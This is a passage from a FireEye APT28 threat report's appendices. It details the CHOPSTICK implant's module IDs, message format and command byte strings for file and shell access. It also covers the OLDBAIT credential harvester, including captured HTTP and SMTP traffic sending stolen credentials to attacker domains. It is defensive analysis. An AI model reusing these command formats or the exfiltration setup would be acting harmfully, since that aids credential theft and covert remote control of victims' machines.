                             00000010 6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee lvcmhjOG9yZQ=<<.
                             00000020 01 00 00 01 00 23 01 10 23 01 11 23 01 13 23 .....#..#..#..#


                             The strings “V4MGNxZWlvcmhjOG9yZQ” and “=<<\xee” are hardcoded in the implant. The module
                             information starts at offset 0x20 with the string “01 00 00” and is formatted as follows:



                               Table 11: Example CHOPSTICK v1 message format



                               Offset	      Value                                   Description

                               00           0x0001                                  Message from the AgentKernel v1

                               02           00                                      Command ID
                               03           01 00 23 01 10 23 01 11 23 01 13 23     List of modules included in the implant
                                                                                    separated by a ‘#’ character




40 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             The modules included in this CHOPSTICK v1 implant are:



 Table 12: Example CHOPSTICK v1 module list



 Module ID         Internal Module Name            Description

 0x0001            AgentKernel                     Kernel, probably version 1. Handles communication between modules and C2
                                                   tunnels.
 0x1001            modKey                          Logs keystrokes and takes screen captures.
 0x1101            modFS                           Facilitates file system access, such as directory browsing along with reading,
                                                   deleting and opening files.
 0x1301            modProcRet                      Remote command shell access.


                              Our determination of a CHOPSTICK “v1” versus “v2” is based on the self-identification of the kernel ID
                              and associated modules. Compare the list of CHOPSTICK v1 modules in Table 12 with the list of modules
                              in an example CHOPSTICK v2 variant in Table 13:


 Table 13: Example CHOPSTICK v2 module list



 Module ID         Internal Module Name            Description

 0x0002            kernel                          Kernel, probably version 2. Handles communication between modules and C2
                                                   tunnels.
 0x1002                                            Logs keystrokes and takes screen captures.
 0x1102                                            Facilitates filesystem access, such as directory browsing along with reading,
                                                   deleting and opening files.
 0x1302                                            Remote command shell access.
 0x1602                                            Load additional DLLs.



41 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             The kernel IDs 0x0001 and 0x0002 indicate different versions. The corresponding modules in each
                             backdoor also are consistently identified with 0x01 and 0x02, respectively, in the second byte. In both
                             variants the modules with keystroke log, file system access, and command shell capabilities have the
                             consistent identifiers 0x10, 0x11, and 0x13, respectively, in the first byte. This suggests that the first byte
                             in the module ID identifies the module type whereas the second byte identifies the kernel version.

                             The kernel sends commands to each module using its module ID. The commands that each module
                             understands are likely consistent from build to build. Table 14 and Table 15 show examples of commands
                             that each module understands.


                               Table 14: Commands understood by modFS (0x1101) module



                               Command ID	             Description         Example

                               01                      Find file           \x01\x11\x01Directory&file&[01]

                               02                      Read file           \x01\x11\x02Directory&file&[01]
                               03                      Write file          \x01\x11\x03Directory&file&[Contents]

                               04                      Delete file         \x01\x11\x04Directory&file&[01]
                               05                      Execute file        \x01\x11\x05Directory&file&[01]



                               Table 15: Commands understood by modProcRet (0x1301) module



                               Command ID	             Description         Example

                               00                      CMD.exe output      \x01\x13\x00[Output]

                               01                      CMD.exe start       \x01\x13\x01
                               02                      CMD.exe exit        \x01\x13\x02

                               11                      CMD.exe input       \x01\x13\x11[Input]



42 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APPENDIX E:
OLDBAIT




                             OLDBAIT is a credential harvester that installs itself in %ALLUSERPROFILE%\\Application Data\
                             Microsoft\MediaPlayer\updatewindws.exe. There is a missing space in the MediaPlayer directory and
                             the filename is missing the ‘o’ character. Both the internal strings and logic are obfuscated and are
                             unpacked at startup. Credentials for the following applications are collected:

                             •	     Internet Explorer
                             •	     Mozilla Firefox
                             •	     Eudora
                             •	     The Bat! (an email client made by a Moldovan company)
                             •	     Becky! (an email client made by a Japanese company)

                             Both email and HTTP can be used to send out the collected credentials. Sample HTTP traffic is
                             displayed in Figure 15.



                                  Figure 15: Example OLDBAIT HTTP traffic




                                  POST /index.php HTTP/1.0


                                  Accept: text/html
                                  Accept-Language: en-us
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 6482
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                  Host: windous.kz
                                  Connection: Keep-Alive
                                  Pragma: no-cache


                                  prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN--cut--




43 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                                Figure 16: Example OLDBAIT SMTP traffic




                                From: lisa.cuddy@wind0ws.kz
                                To: dr.house@wind0ws.kz
                                Subject: photo(9a3d8ea4-test)
                                Date: Tue, 23 Sep 2014 15:42:56 -0500
                                MIME-Version: 1.0
                                Content-Type: text/plain;
                                	charset=”us-ascii”
                                Content-Transfer-Encoding: 7bit
                                X-Priority: 3
                                X-MSMail-Priority: Normal
                                X-Mailer: Microsoft Outlook Express 6.00.2900.2670
                                X-MimeOLE: Produced By Microsoft MimeOLE v6.00.2900.2670
                                X-Spam: Not detected
                                ===STARTPOINT===
                                qVV5KyHocV3FkUeENvu9LnVIlRB0YTa7xhoTwhRlIBBI7gRzVxikQXDRkdy4vGt1WfBtg9Utzbny
                                Uh+usXJHZ9Esecqq0UKg5Ul1O2E2OiyBTnGDPdP00UMRx/E+2it/10wQyH/epo8zuLnCuxPe7B+K
                                --cut---
                                hU+MWBLP+7h5ZojN
                                ===ENDPOINT===




                             OLDBAIT handles APIs very similarly to SOURFACE and EVILTOSS. There is a setup routine that loads
                             the imports into a table and all API calls reference an index to this table. In SOURFACE and EVILTOSS the
                             table is stored in a global variable while in OLDBAIT this table is allocated at runtime and a pointer is
                             passed between functions.




44 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | 408.321.6300 | 877.FIREEYE (347.3393) | info@fireeye.com | www.fireeye.com


© 2014 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc.
All other brands, products, or service names are or may be trademarks or service marks of
their respective owners. SP.APT28.EN-US.102014
45 fireeye.com
